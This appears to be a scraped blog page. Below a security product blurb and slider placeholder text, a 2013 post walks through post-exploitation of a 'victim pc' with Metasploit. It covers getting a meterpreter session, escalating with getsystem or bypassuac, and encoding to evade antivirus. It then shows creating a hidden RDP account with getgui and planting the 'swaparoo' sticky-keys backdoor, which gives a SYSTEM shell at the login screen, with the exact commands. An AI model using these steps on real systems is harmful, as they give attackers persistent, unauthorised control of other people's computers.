platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Post exploitation & swaparoo backdoor.
published on 2013-08-23 15:25:00 UTC by nirav desai Content:
Today we are going to create valid RDP user in victim pc using two method.
(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )
Now we use meterpreter script which create RDP useraccount for logon. run getgui -u username -p password.
Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.
rdesktop victim i.p.
When you complete your session type following command for cleanup process; so after you logoff created useraccount will be deleted.
run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc
(2)Now we use another method; it`s backdoor.But it`s physical backdoor; so you have to present at victim pc to get access.But backdoor is created remotely.
Put it into the /opt/msf/scripts/meterpreter folder
After that get meterpreter shell using any method.
Now type run swaparoo -h
Now type run swaparoo
As you can see in image last line is "[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!"
So when you restart victim pc & login screen appear ; just press shift key 5 times (From victim `s keyboard)you get cmd with system privilege.Now from cmd you can do anything like remove user,add user, change password.
If you want to remove this backdoor then type following command
run swaparoo -r
What`s limitation?
Anyone who is physically present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.